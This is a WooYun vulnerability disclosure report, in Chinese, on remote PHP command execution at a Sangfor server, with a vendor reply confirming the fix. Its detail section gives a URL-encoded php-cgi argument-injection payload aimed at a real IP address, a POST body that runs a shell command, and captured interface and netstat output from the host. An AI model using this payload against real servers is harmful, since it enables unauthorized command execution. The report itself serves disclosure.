当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0193980

漏洞标题:深信服某服务器存在php命令执行

相关厂商:深信服

漏洞作者: Jannock

提交时间:2016-04-08 18:00

修复时间:2016-05-26 17:50

公开时间:2016-05-26 17:50

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-08: 细节已通知厂商并且等待厂商处理中
2016-04-11: 厂商已经确认,细节仅向厂商公开
2016-04-21: 细节向核心白帽子及相关领域专家公开
2016-05-01: 细节向普通白帽子公开
2016-05-11: 细节向实习白帽子公开
2016-05-26: 细节向公众公开

简要描述:

深信服某服务器存在php命令执行

详细说明:

网址:
http://202.131.75.66/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E
POST:
<?php echo system("ps aux");?>

漏洞证明:

sf0.png


eth0      Link encap:Ethernet  HWaddr 6c:f0:49:aa:83:6d  
          inet addr:172.200.0.10  Bcast:172.200.0.255  Mask:255.255.255.0
          inet6 addr: fe80::6ef0:49ff:feaa:836d/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:45705971 errors:0 dropped:0 overruns:0 frame:0
          TX packets:11507562 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:2977449802 (2.9 GB)  TX bytes:2018109677 (2.0 GB)
          Interrupt:26 Base address:0xc000 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:35467 errors:0 dropped:0 overruns:0 frame:0
          TX packets:35467 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:2905574 (2.9 MB)  TX bytes:2905574 (2.9 MB)


Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:8088            0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN     
tcp        0      0 172.200.0.10:80         172.200.0.254:56256     TIME_WAIT  
tcp        0      0 172.200.0.10:80         172.200.0.254:56258     ESTABLISHED
tcp        0      0 172.200.0.10:80         172.200.0.254:56254     TIME_WAIT  
tcp        0      0 172.200.0.10:52369      195.10.212.160:2087     ESTABLISHED
tcp6       0      0 :::22                   :::*                    LISTEN     
tcp6       0      0 :::22                   :::*                    LISTEN

修复方案:

打补丁

版权声明:转载请注明来源 Jannock@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-04-11 17:48

厂商回复:

感谢白帽子提交的问题。经确认,该问题确实存在。该服务器是我们区域自行搭建的渠道访问系统,目前正处于测试阶段, 5月份会发布正式版并进行安全维护,虽然该系统内部数据并不涉及核心业务,但此漏洞确实严重等级较高,综合考虑,我们给这个漏洞中危最高评级。
目前,该漏洞已经修复。
感谢白帽子为我们指出问题,请白帽子私信留下联系方式,我们将为您寄送礼物以示答谢!

最新状态:

暂无